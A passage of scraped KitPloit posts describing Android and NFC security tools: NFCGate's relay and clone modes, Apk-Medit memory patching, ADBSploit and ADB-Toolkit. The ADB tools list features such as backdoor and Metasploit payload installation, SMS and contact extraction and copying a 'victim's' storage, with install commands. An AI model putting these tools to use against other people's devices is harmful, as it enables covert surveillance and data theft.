(12)"><strong>Replay</strong></a></li> <li><a 
href="https://github.com/nfcgate/nfcgate/blob/v2/doc/mode/Clone.md" rel="nofollow" target="_blank" title="An NFC research toolkit application for Android (13)"><strong>Clone</strong></a></li> </ul> <br /><b>Pcapng Export</b><br /> <p>Captured traffic can be exported to or imported from the <a href="https://github.com/pcapng/pcapng" rel="nofollow" target="_blank" title="pcapng">pcapng</a> file format. For example, Wireshark can be used to further analyze NFC traffic. A detailed description of the import and export functionality is given in <a href="https://github.com/nfcgate/nfcgate/blob/v2/doc/pcapng.md" rel="nofollow" target="_blank" title="doc/pcapng.md">doc/pcapng.md</a>.</p> <br /><span style="font-size: large;"><b>Compatibility</b></span><br /> <p>NFCGate provides an in-app status check. For further notes on compatibility see the <a href="https://github.com/nfcgate/nfcgate/blob/v2/doc/Compatibility.md" rel="nofollow" target="_blank" title="compatibility document">compatibility document</a>.</p> <br /><span style="font-size: large;"><b>Known Issues and Caveats</b></span><br /> <p>Please consider the following issues and caveats before using the application (and especially before filing a bug report).</p> <br /><b>NFC Stack</b><br /> <p>When using modes that utilize HCE, the phone has to implement the <a href="https://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specification/" rel="nofollow" target="_blank" title="NFC Controller Interface (NCI)">NFC Controller Interface (NCI)</a> specification. Most phones that offer HCE support should implement this specification.</p> <br /><b>Confidentiality of Data Channel (relay)</b><br /> <p>Right now, all data in relay mode is sent <em>unencrypted</em> over the network. 
We may or may not get around to implementing cryptographic protection, but for now, consider everything you send over the network to be readable by anyone interested, unless you use extra protection like VPNs. Keep that in mind while performing your own tests.</p> <br /><b>Compatibility with Cards (relay, replay, clone)</b><br /> <p>We can only proxy tags supported by Android. For example, Android no longer offers support for MiFare Classic chips, so these cards are not supported. When in doubt, use an application like NFC Tag Info to find out whether your tag is compatible. Also, at the moment, every tag technology supported by Android's HCE is supported (A, B, F); however, NFC-B and NFC-F remain untested. NFC-A tags are the most common tags (for example, both the MiFare DESFire and specialized chips like the ones in electronic passports use NFC-A), but you may experience problems if you use other tags.</p> <br /><b>Compatibility with readers (relay)</b><br /> <p>This application only works with readers that do not implement additional security measures. One security measure that will prevent our application from working in relay mode is the reader checking the time it takes the card to respond (or, in the more general case, the reader implementing "distance bounding"). The network transmission adds a noticeable delay to any transaction, so any secure reader will not accept our proxied replies.<br /> This does not affect other operating modes.</p> <br /><b>Android NFC limitations (relay, replay)</b><br /> <p>Some features of NFC are not supported by Android and thus cannot be used with our application. We have experienced cases where the NFC field generated by the phone was not strong enough to properly power more advanced features of some NFC chips (e.g. cryptographic operations). 
Keep this in mind if you are testing chips we have not experimented with.</p> <br /><span style="font-size: large;"><b>Publications and Media</b></span><br /> <p>This application was <a href="https://www.usenix.org/conference/woot20/presentation/klee" rel="nofollow" target="_blank" title="presented at the 14th USENIX Workshop on Offensive Technologies (WOOT '20)">presented at the 14th USENIX Workshop on Offensive Technologies (WOOT '20)</a>. An <a href="https://arxiv.org/abs/2008.03913" rel="nofollow" target="_blank" title="arXiv preprint can be found here">arXiv preprint can be found here</a>.</p> <p>An early version of this application was presented at WiSec 2015. The <a href="https://blog.velcommuta.de/wp-content/uploads/2015/07/nfcgate-extended-abstract.pdf" rel="nofollow" target="_blank" title="extended Abstract">extended Abstract</a> and <a href="https://blog.velcommuta.de/wp-content/uploads/2015/07/NFCGate-Poster.pdf" rel="nofollow" target="_blank" title="poster">poster</a> can be found on the <a href="https://blog.velcommuta.de/publications/" rel="nofollow" target="_blank" title="website">website</a> of one of the authors. 
It was also presented in a brief <a href="https://media.ccc.de/browse/conferences/camp2015/camp2015-6862-lightning_talks_day_2.html#video&t=300" rel="nofollow" target="_blank" title="Lightning Talk">Lightning Talk</a> at the <a href="https://events.ccc.de/camp/2015/wiki/Main_Page" rel="nofollow" target="_blank" title="Chaos Communication Camp 2015">Chaos Communication Camp 2015</a>.</p> <br /><span style="font-size: large;"><b>Reference our Project</b></span><br /> <p>Any use of this project which results in an academic publication or other publication which includes a bibliography should include a citation to NFCGate:</p> <pre><code>@inproceedings {257188,<br /> author = {Steffen Klee and Alexandros Roussos and Max Maass and Matthias Hollick},<br /> title = {NFCGate: Opening the Door for {NFC} Security Research with a Smartphone-Based Toolkit},<br /> booktitle = {14th {USENIX} Workshop on Offensive Technologies ({WOOT} 20)},<br /> year = {2020},<br /> url = {https://www.usenix.org/conference/woot20/presentation/klee},<br /> publisher = {{USENIX} Association},<br /> month = aug,<br />}<br /></code></pre> <br /><span style="font-size: large;"><b>License</b></span><br /> <pre><code> Copyright 2015-2020 NFCGate Team<br /><br /> Licensed under the Apache License, Version 2.0 (the "License");<br /> you may not use this file except in <a href="https://www.kitploit.com/search/label/Compliance" target="_blank" title="compliance">compliance</a> with the License.<br /> You may obtain a copy of the License at<br /><br /> http://www.apache.org/licenses/LICENSE-2.0<br /><br /> Unless required by applicable law or agreed to in writing, software<br /> <a href="https://www.kitploit.com/search/label/Distributed" target="_blank" title="distributed">distributed</a> under the License is distributed on an "AS IS" BASIS,<br /> WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<br /> See the License for the specific language governing permissions and<br /> 
limitations under the License.<br /></code></pre> <br /><span style="font-size: large;"><b>Contact</b></span><br /> <ul> <li><a href="https://www.informatik.tu-darmstadt.de/seemoo/team_seemoo/steffen_klee/steffen_klee.en.jsp" rel="nofollow" target="_blank" title="Steffen Klee">Steffen Klee</a></li> <li><a href="https://www.informatik.tu-darmstadt.de/seemoo/team_seemoo/max_maass/index.en.jsp" rel="nofollow" target="_blank" title="Max Maass">Max Maass</a></li> </ul> <br /><span style="font-size: large;"><b>Used Libraries</b></span><br /> <ul> <li><a href="https://github.com/iqiyi/xHook" rel="nofollow" target="_blank" title="xHook">xHook</a> (Licensed under the <a href="https://opensource.org/licenses/MIT" rel="nofollow" target="_blank" title="MIT License">MIT License</a>)</li> <li><a href="https://github.com/rovo89/XposedBridge" rel="nofollow" target="_blank" title="Xposed Bridge">Xposed Bridge</a> (Licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> <li><a href="https://android.googlesource.com/platform/external/libnfc-nci/" rel="nofollow" target="_blank" title="LibNFC-NCI">LibNFC-NCI</a> (Licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> <li><a href="https://github.com/protocolbuffers/protobuf" rel="nofollow" target="_blank" title="Protobuf">Protobuf</a> (Licensed under the modified <a href="http://opensource.org/licenses/BSD-3-Clause" rel="nofollow" target="_blank" title="BSD 3-Clause License">BSD 3-Clause License</a>)</li> <li><a href="https://github.com/medyo/android-about-page" rel="nofollow" target="_blank" title="Android About Page">Android About Page</a> (Licensed under the <a href="https://opensource.org/licenses/MIT" rel="nofollow" target="_blank" title="MIT License">MIT License</a>)</li> <li><a 
href="https://github.com/jaredrummler/AndroidDeviceNames" rel="nofollow" target="_blank" title="Android Device Names">Android Device Names</a> (Licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> <li><a href="https://github.com/Gericop/Android-Support-Preference-V7-Fix" rel="nofollow" target="_blank" title="Android Support library - preference v7 bugfix">Android Support library - preference v7 bugfix</a> (Released into the public domain and partly licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> <li><a href="https://developer.android.com/topic/libraries/architecture/room" rel="nofollow" target="_blank" title="Android Room">Android Room</a> (Licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> <li><a href="https://developer.android.com/topic/libraries/architecture/lifecycle" rel="nofollow" target="_blank" title="Android Lifecycle">Android Lifecycle</a> (Licensed under the <a href="http://opensource.org/licenses/Apache-2.0" rel="nofollow" target="_blank" title="Apache License v2.0">Apache License v2.0</a>)</li> </ul> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li><a href="https://github.com/crmulliner/adbi" rel="nofollow" target="_blank" title="ADBI">ADBI</a>: ARM and THUMB inline hooking</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/nfcgate/nfcgate" rel="nofollow" target="_blank" title="Download Nfcgate">Download Nfcgate</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-39135124403604499542020-10-19T17:30:00.001-03:002020-10-19T17:30:10.215-03:00Apk-Medit - Memory Search And 
Patch Tool On Debuggable Apk Without Root & Ndk<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-RqXEBotLg98/X40OqtZc7LI/AAAAAAAAUE4/pikPCjcpYe08SkjPCkqsQIndoT_duv_vgCNcBGAsYHQ/s1312/terminal.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="785" data-original-width="1312" height="382" src="https://1.bp.blogspot.com/-RqXEBotLg98/X40OqtZc7LI/AAAAAAAAUE4/pikPCjcpYe08SkjPCkqsQIndoT_duv_vgCNcBGAsYHQ/w640-h382/terminal.gif" width="640" /></a></div><p><br /></p> <p>Apk-medit is a <a href="https://www.kitploit.com/search/label/Memory" target="_blank" title="memory">memory</a> search and patch tool for debuggable APKs that requires neither root nor the NDK. It was created for mobile game security testing.</p><span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>Motivation</b></span><br /> <p>Memory <a href="https://www.kitploit.com/search/label/Modification" target="_blank" title="modification">modification</a> is the easiest way to cheat in games, so it is one of the items to be checked in a security test. There are also cheat tools that can be used casually, like GameGuardian. However, there were no tools available for non-rooted devices with a CUI (command-line interface). 
So I made it as a security <a href="https://www.kitploit.com/search/label/Testing" target="_blank" title="testing">testing</a> tool.</p> <br /><span style="font-size: large;"><b>Demo</b></span><br /> <p>This is a demo that uses apk-medit to clear a game that requires one million taps.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-RqXEBotLg98/X40OqtZc7LI/AAAAAAAAUE4/pikPCjcpYe08SkjPCkqsQIndoT_duv_vgCNcBGAsYHQ/s1312/terminal.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="785" data-original-width="1312" height="382" src="https://1.bp.blogspot.com/-RqXEBotLg98/X40OqtZc7LI/AAAAAAAAUE4/pikPCjcpYe08SkjPCkqsQIndoT_duv_vgCNcBGAsYHQ/w640-h382/terminal.gif" width="640" /></a></div><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Mm4L1zJz_zI/X40OwBk72_I/AAAAAAAAUE8/aO_46pZ3Jk0KvH8w6t_NFqexioHTUsmBwCNcBGAsYHQ/s658/demo-app.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="658" data-original-width="320" height="320" src="https://1.bp.blogspot.com/-Mm4L1zJz_zI/X40OwBk72_I/AAAAAAAAUE8/aO_46pZ3Jk0KvH8w6t_NFqexioHTUsmBwCNcBGAsYHQ/s320/demo-app.gif" /></a></div><p><br /></p><span style="font-size: large;"><b>Installation</b></span><br /> <p>Download the <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> from <a href="https://github.com/aktsk/apk-medit/releases/" rel="nofollow" target="_blank" title="GitHub Releases">GitHub Releases</a> and push it to <code>/data/local/tmp/</code> on an <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="android">Android</a> device.</p> <pre><code>$ adb push medit /data/local/tmp/medit<br />medit: 1 file pushed. 29.0 MB/s (3135769 bytes in 0.103s)<br /></code></pre> <br /><b>How to Build</b><br /> <p>You can build it with the make command. 
It requires a Go compiler. After the build completes, if adb is connected, the built binary is pushed to <code>/data/local/tmp/</code> on the Android device.</p> <pre><code>$ make<br />GOOS=linux GOARCH=arm64 GOARM=7 go build -o medit<br />/bin/sh -c "adb push medit /data/local/tmp/medit"<br />medit: 1 file pushed. 23.7 MB/s (3131205 bytes in 0.126s)<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>Apk-medit uses the <code>run-as</code> command to read the files used by the target app, so it can only be used with apps that have the debuggable attribute enabled. To enable the debuggable attribute, open <code>AndroidManifest.xml</code> and add the following attribute to the <code>application</code> node:</p> <pre><code>android:debuggable="true"<br /></code></pre> <p>You can also use <a href="https://github.com/aktsk/apkutil" rel="nofollow" target="_blank" title="aktsk/apkutil">aktsk/apkutil</a> to enable the debuggable attribute without editing <code>AndroidManifest.xml</code>, which is convenient.</p> <pre><code>$ apkutil debuggable <target-apk-name>.apk<br /></code></pre> <p>After running the <code>run-as</code> command, the working directory changes automatically, so copy <code>medit</code> from <code>/data/local/tmp/</code>. 
Running <code>medit</code> launches an interactive prompt.</p> <pre><code>$ adb shell<br />$ pm list packages # to check <target-package-name><br />$ run-as <target-package-name><br />$ cp /data/local/tmp/medit ./medit<br />$ ./medit<br /></code></pre> <br /><b>Commands</b><br /> <p>These are the commands available in the interactive prompt.</p> <br /><b>find</b><br /> <p>Search memory for the specified integer.</p> <pre><code>> find 999982<br />Search UTF-8 String...<br />Target Value: 999982([57 57 57 57 56 50])<br />Found: 0!<br />------------------------<br />Search Word...<br />parsing 999982: value out of range<br />------------------------<br />Search Double Word...<br />Target Value: 999982([46 66 15 0])<br />Found: 1!<br />Address: 0xe7021f70<br /></code></pre> <p>You can also specify a datatype such as string, word, dword or qword.</p> <pre><code>> find dword 999996<br />Search Double Word...<br />Target Value: 999996([60 66 15 0])<br />Found: 1!<br />Address: 0xe7021f70<br /></code></pre> <br /><b>filter</b><br /> <p>Filter the previous search results, keeping only those that also match the current search.</p> <pre><code>> filter 993881<br />Check previous results of searching dword...<br />Target Value: 993881([89 42 15 0])<br />Found: 1!<br />Address: 0xe7021f70<br /></code></pre> <br /><b>patch</b><br /> <p>Write the specified value to the address found by the search.</p> <pre><code>> patch 10<br />Successfully patched!<br /></code></pre> <br /><b>ps</b><br /> <p>Find the target process and, if there is exactly one, set it as the target. 
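The find and filter commands above match the raw little-endian bytes of the value, which is why the transcript prints 999982 as [46 66 15 0] and why the word search rejects it as out of range. The following Go program is an added example, not apk-medit's own code: it models one find/filter round over a constructed memory snapshot (the base address 0xe7021f00, the offsets and the stale-copy decoy are all constructed) and shows why a counter kept as a plain integer is pinned to a single address as soon as it changes, which is exactly the weakness a game's security test looks for.

```go
// Added example, not apk-medit's own code: a model of the find / filter cycle
// from the transcript above, run over a constructed byte slice that stands in
// for one readable region of the target process (all values are constructed).
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
)

// Region is a snapshot of readable memory starting at address Base.
type Region struct {
	Base uint64
	Data []byte
}

// encode produces the little-endian pattern the tool searches for; the
// transcript prints it in decimal, e.g. dword 999982 -> [46 66 15 0]. A value
// too large for the datatype is rejected ("parsing 999982: value out of range").
func encode(kind string, value uint64) ([]byte, error) {
	width := map[string]int{"word": 2, "dword": 4, "qword": 8}[kind]
	if width == 0 {
		return nil, fmt.Errorf("unknown datatype %q", kind)
	}
	if width < 8 && value >= 1<<(8*uint(width)) {
		return nil, fmt.Errorf("parsing %d: value out of range", value)
	}
	pat := make([]byte, 8)
	binary.LittleEndian.PutUint64(pat, value)
	return pat[:width], nil
}

// find returns every address holding value, like the tool's "find" command.
func find(r Region, kind string, value uint64) ([]uint64, error) {
	pat, err := encode(kind, value)
	if err != nil {
		return nil, err
	}
	var hits []uint64
	for off := 0; off+len(pat) <= len(r.Data); off++ {
		if bytes.Equal(r.Data[off:off+len(pat)], pat) {
			hits = append(hits, r.Base+uint64(off))
		}
	}
	return hits, nil
}

// filter keeps the previous hits that now hold the new value, like the tool's
// "filter" command: once the counter changes, only the live copy survives.
func filter(r Region, prev []uint64, kind string, value uint64) ([]uint64, error) {
	pat, err := encode(kind, value)
	if err != nil {
		return nil, err
	}
	var kept []uint64
	for _, addr := range prev {
		off := addr - r.Base
		end := off + uint64(len(pat))
		if addr >= r.Base && end <= uint64(len(r.Data)) && bytes.Equal(r.Data[off:end], pat) {
			kept = append(kept, addr)
		}
	}
	return kept, nil
}

// snapshot builds the constructed region: the live tap counter at +0x70 and a
// stale copy of the starting value at +0x10 that never changes.
func snapshot(counter uint32) Region {
	data := make([]byte, 0x100)
	binary.LittleEndian.PutUint32(data[0x10:], 999982)
	binary.LittleEndian.PutUint32(data[0x70:], counter)
	return Region{Base: 0xe7021f00, Data: data}
}

func main() {
	r := snapshot(999982)
	hits, _ := find(r, "dword", 999982) // live counter plus the stale copy
	fmt.Printf("Found: %d!\n", len(hits))
	r = snapshot(993881) // the player keeps tapping; only the live counter moves
	hits, _ = filter(r, hits, "dword", 993881)
	fmt.Printf("Found: %d! Address: %#x\n", len(hits), hits[0])
	_, err := find(r, "word", 999982)
	fmt.Println(err)
}
```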
<code>ps</code> runs automatically on startup.</p> <pre><code>> ps<br />Package: jp.aktsk.tap1000000, PID: 4398<br />Target PID has been set to 4398.<br /></code></pre> <br /><b>attach</b><br /> <p>If the target PID has been set by <code>ps</code>, attach to the target process and stop all processes in the app via ptrace.</p> <pre><code>> attach<br />Target PID: 4398<br />Attached TID: 4398<br />Attached TID: 4405<br />Attached TID: 4407<br />Attached TID: 4408<br />Attached TID: 4410<br />Attached TID: 4411<br />Attached TID: 4412<br />Attached TID: 4413<br />Attached TID: 4414<br />Attached TID: 4415<br />Attached TID: 4418<br />Attached TID: 4420<br />Attached TID: 4424<br />Attached TID: 4429<br />Attached TID: 4430<br />Attached TID: 4436<br />Attached TID: 4437<br />Attached TID: 4438<br />Attached TID: 4439<br />Attached TID: 4440<br />Attached TID: 4441<br />Attached TID: 4442<br /></code></pre> <p>If the target PID is not set, it can be specified on the command line.</p> <pre><code>> attach <pid><br /></code></pre> <br /><b>detach</b><br /> <p>Detach from the attached process.</p> <pre><code>> detach<br />Detached TID: 4398<br />Detached TID: 4405<br />Detached TID: 4407<br />Detached TID: 4408<br />Detached TID: 4410<br />Detached TID: 4411<br />Detached TID: 4412<br />Detached TID: 4413<br />Detached TID: 4414<br />Detached TID: 4415<br />Detached TID: 4418<br />Detached TID: 4420<br />Detached TID: 4424<br />Detached TID: 4429<br />Detached TID: 4430<br />Detached TID: 4436<br />Detached TID: 4437<br />Detached TID: 4438<br />Detached TID: 4439<br />Detached TID: 4440<br />Detached TID: 4441<br />Detached TID: 4442<br /></code></pre> <br /><b>dump</b><br /> <p>Display a memory dump in hexdump style.</p> <pre><code>> dump 0xf0aee000 0xf0aee300<br />Address range: 0xf0aee000 - 0xf0aee300<br />----------------------------------------------<br />00000000 34 32 20 61 6e 73 77 65 72 20 28 74 6f 20 6c 69 |42 answer (to li|<br />00000010 66 65 20 74 68 65 20 75 6e 69 76 65 72 73 65 20 
|fe the universe |<br />00000020 65 74 63 7c 33 29 0a 33 31 34 20 70 69 0a 31 30 |etc|3).314 pi.10|<br />00000030 30 33 20 61 75 64 69 74 64 20 28 61 76 63 7c 33 |03 auditd (avc|3|<br />00000040 29 0a 31 30 30 34 20 63 68 61 74 74 79 20 28 64 |).1004 chatty (d|<br />00000050 72 6f 70 70 65 64 7c 33 29 0a 31 30 30 35 20 74 |ropped|3).1005 t|<br />00000060 61 67 5f 64 65 66 20 28 74 61 67 7c 31 29 2c 28 |ag_def (tag|1),(|<br />00000070 6e 61 6d 65 7c 33 29 2c 28 66 6f 72 6d 61 74 7c |name|3),(format||<br />00000080 33 29 0a 31 30 30 36 20 6c 69 62 6c 6f 67 20 28 |3).1006 liblog (|<br />00000090 64 72 6f 70 70 65 64 7c 31 29 0a 32 37 31 38 20 |dropped|1).2718 |<br />000000a0 65 0a 32 37 31 39 20 63 6f 6e 66 69 67 75 72 61 |e.2719 configura|<br />000000b0 74 69 6f 6e 5f 63 68 61 6e 67 65 64 20 28 63 6f |tion_changed (co|<br />000000c0 6e 66 69 67 20 6d 61 73 6b 7c 31 7c 35 29 0a 32 |nfig mask|1|5).2|<br />000000d0 37 32 30 20 73 79 6e 63 20 28 69 64 7c 33 29 2c |720 sync (id|3),|<br />000000e0 28 65 76 65 6e 74 7c 31 7c 35 29 2c 28 73 6f 75 |(event|1|5),(sou|<br />000000f0 72 63 65 7c 31 7c 35 29 2c 28 61 63 63 6f 75 6e |rce|1|5),(accoun|<br /></code></pre> <br /><b>exit</b><br /> <p>To exit medit, use the <code>exit</code> command or <code>Ctrl-D</code>.</p> <pre><code>> exit<br />Bye!<br /></code></pre> <br /><span style="font-size: large;"><b>Test</b></span><br /> <p>You can run the tests with the make command.</p> <pre><code>$ make test<br /></code></pre> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/aktsk/apk-medit" rel="nofollow" target="_blank" title="Download Apk-Medit">Download Apk-Medit</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-22986641684380403202020-08-21T08:30:00.000-04:002020-08-21T08:30:07.002-04:00ADBSploit - A Python Based Tool For Exploiting And Managing Android Devices Via ADB<div class="separator" style="clear: 
both; text-align: center;">
<a href="https://1.bp.blogspot.com/-CGHR9xSx3fE/Xzn0EXwWJSI/AAAAAAAATfE/qSon4XhvNGEALRXLirQcYbwoNnWo1_hbgCNcBGAsYHQ/s1600/adbsploit_1_adbsploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="136" data-original-width="430" src="https://1.bp.blogspot.com/-CGHR9xSx3fE/Xzn0EXwWJSI/AAAAAAAATfE/qSon4XhvNGEALRXLirQcYbwoNnWo1_hbgCNcBGAsYHQ/s1600/adbsploit_1_adbsploit.png" /></a></div>
<br />
A Python-based tool for exploiting and managing <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> devices via ADB<br />
<br />
<span style="font-size: large;"><b>Currently in development</b></span><br />
<ul>
<li>Screenrecord</li>
<li>Stream Screenrecord</li>
<li>Extract Contacts</li>
<li>Extract SMS</li>
<li>Extract Messaging App Chats WhatsApp/Telegram/Line</li>
<li>Install Backdoor</li>
<li>And more...</li>
</ul>
<a name='more'></a><br />
<span style="font-size: large;"><b>Installation</b></span><br />
<pre><code># First download or clone the repo
git clone https://github.com/mesquidar/adbsploit.git
# Move to the directory
cd adbsploit
# Install it
python setup.py install
# Execute
adbsploit
# Enjoy!!</code></pre>
<br />
<b>Requirements</b><br />
<ul>
<li>Python 3.X</li>
</ul>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<ul>
<li>Execute the command: devices</li>
<li>Then select the device with: select</li>
<li>You can connect to the device using the command: connect</li>
<li>Type help for more information</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Functionalities</b></span><br />
<br />
<span style="font-size: large;"><b>v0.2</b></span><br />
<br />
<b>Added:</b><br />
<ul>
<li>Fixed setup and installation</li>
<li>Extract Contacts</li>
<li>Extract SMS</li>
<li>Send SMS</li>
<li>Recovery Mode</li>
<li>Fastboot Mode</li>
<li>Device Info</li>
<li>Kill Process</li>
</ul>
<br />
<span style="font-size: large;"><b>v0.1</b></span><br />
<ul>
<li>List Devices</li>
<li>Connect Devices</li>
<li>TCPIP</li>
<li>Forward Ports</li>
<li>Airplane Management</li>
<li>Wifi Management</li>
<li>Sound Control</li>
<li>List/Info Apps</li>
<li>WPA Supplicant Extraction</li>
<li>Install/Uninstall Apps</li>
<li>Shutdown/Reboot</li>
<li>Logs</li>
<li>Start/Stop/Clear Apps</li>
<li>Show Inet/MAC</li>
<li>Battery Status</li>
<li>Netstat</li>
<li>Check/Unlock/Lock Screen</li>
<li>Turn On/Off Screen</li>
<li>Swipe Screen</li>
<li>Screencapture</li>
<li>Send Keyevent</li>
<li>Open Browser URL</li>
<li>Process List</li>
<li>Dump Meminfo/Hierarchy</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/mesquidar/adbsploit" rel="nofollow" target="_blank" title="Download Adbsploit">Download Adbsploit</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-40219866576235010642020-07-22T17:30:00.000-04:002020-07-22T17:30:03.802-04:00Lazybee - Wordlist Generator Tool for Termux<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-VHrO3vAsLfo/Xwu7hTHcj-I/AAAAAAAATI8/QHSCQ83sLvAYs2zDIYPxjmTRJIpfYfFZgCNcBGAsYHQ/s1600/lazybee_5.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="451" data-original-width="720" height="400" src="https://1.bp.blogspot.com/-VHrO3vAsLfo/Xwu7hTHcj-I/AAAAAAAATI8/QHSCQ83sLvAYs2zDIYPxjmTRJIpfYfFZgCNcBGAsYHQ/s640/lazybee_5.jpeg" width="640" /></a></div>
<br />
Lazybee is a Python-based script that generates random <a href="https://www.kitploit.com/search/label/Wordlist" target="_blank" title="wordlist">wordlists</a> for brute-force attacks. It has unique features such as calculating the wordlist generation time and saving the result directly as a .txt file in the current directory. It works on both rooted and non-rooted <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> devices.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Lazybee is available for</b></span><br />
<ul>
<li>Termux</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation and usage guide</b></span><br />
<pre><code>$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install requests
# random is part of the Python standard library; it does not need to be installed with pip
$ ls
$ git clone https://github.com/noob-hackers/lazybee
$ ls
$ cd lazybee
$ ls
$ python2 lazybee.py</code></pre>
Example session:<br />
<pre><code>Enter the number of characters: 8
Name your wordlist wit (.txt) extensions: pass.txt
WOW... you just created wordlist in hackers way.</code></pre>
<br />
<span style="font-size: large;"><b>Warning</b></span><br />
<em><strong>This tool is only for educational purposes. If you use this tool for any purpose other than education, we will not be responsible in such cases.</strong></em><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/noob-hackers/lazybee" rel="nofollow" target="_blank" title="Download Lazybee">Download Lazybee</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-35160848998571926442020-07-21T17:30:00.000-04:002020-07-21T17:30:07.716-04:00ADB-Toolkit - Tool for testing your Android device<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ZhDQhHwsaOA/Xwu5ZG8t3MI/AAAAAAAATIU/n_9vtY394s0IvlEGvpBotNlxsqZ-whLeQCNcBGAsYHQ/s1600/ADB-Toolkit_7_git1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="861" data-original-width="849" height="640" src="https://1.bp.blogspot.com/-ZhDQhHwsaOA/Xwu5ZG8t3MI/AAAAAAAATIU/n_9vtY394s0IvlEGvpBotNlxsqZ-whLeQCNcBGAsYHQ/s640/ADB-Toolkit_7_git1.jpeg" width="631" /></a></div>
<br />
<strong>ADB-Toolkit is a Bash script with 28 options and a Metasploit section with 6 more options, made for easy <a href="https://www.kitploit.com/search/label/Penetration%20Testing" target="_blank" title="penetration testing">penetration testing</a> of Android devices.</strong> You can do pretty much anything with this script and test whether your Android device is safe or not. The script is built on ADB (Android Debug Bridge), a tool developers use to debug Android devices, but as we know everything has two sides, a good one and a bad one. I'm not telling you to do bad things, but don't do illegal things or the FBI will find you.<br />
Note: I'm not responsible for anything you do to anyone with this tool; it does not come under my responsibility.<br />
<strong>METASPLOIT SECTION:</strong> This section consists of scripts related to Metasploit payloads: you can create a payload, install it and launch it without even touching the phone, and you know the power of Metasploit.<br />
<a name='more'></a><br />
<span style="font-size: x-large;"><b>Changelogs</b></span><br />
<br />
<span style="font-size: large;"><b>Changelog v2.32</b></span><br />
<pre><code>Added version checking code
Really big bug fixes
Wiki made</code></pre>
<br />
<span style="font-size: large;"><b>Changelog V2.3</b></span><br />
<pre><code>Added multi-device support, now 3
Added support for Arch, Fedora, CentOS
Added option to restart the ADB server or not at the beginning of the script
Added option to clear the screen when a specific option is done executing
Fixed the Exit option (was not working)
Simplified the remote connection establishment
Fixed hundreds of bugs
Specified the directories for pulling the data
Made the script executable from anywhere in the shell (fixed)</code></pre>
<br />
<span style="font-size: large;"><b>Changelog V2.1</b></span><br />
<pre><code>Added <a href="https://www.kitploit.com/search/label/Metasploit" target="_blank" title="Metasploit">Metasploit</a> Section
Added option to restart the ADB server or not at the beginning of the script
Added 7 more options:
1. COPY ALL DEVICE STORAGE
2. COPY A SPECIFIED FILE OR FOLDER
3. PUT A FILE IN VICTIMS DEVICE
4. LAUNCH AN APPLICATION
5. CHECK IS PHONE ROOTED OR NOT
6. HANG THE PHONE ( Rooted Phone )
7. SEND SMS FROM THE PHONE
Fixed the remote connection not establishing
Made the script executable from anywhere in the shell</code></pre>
<br />
<span style="font-size: x-large;"><b>Prerequisite</b></span><br />
Before using this tool you must enable USB debugging in the Android developer settings; then you are good to go.<br />
<div>
<pre><code>1. Go to Settings
2. Go to About device/tablet
3. Tap Build Number 7 times
4. Developer options will appear
5. Go to Developer options
6. Search for USB <a href="https://www.kitploit.com/search/label/Debugging" target="_blank" title="Debugging">Debugging</a> & Install via USB
7. Turn those settings on</code></pre>
</div>
<br />
<span style="font-size: x-large;"><b>Installation</b></span><br />
I suggest you <a href="https://www.kitploit.com/search/label/Reinstall" target="_blank" title="reinstall">reinstall</a> the toolkit or git pull it for every new release.<br />
<div>
<pre><code>git clone https://github.com/ASHWIN990/ADB-Toolkit.git
cd ADB-Toolkit
sudo chmod +x install.sh
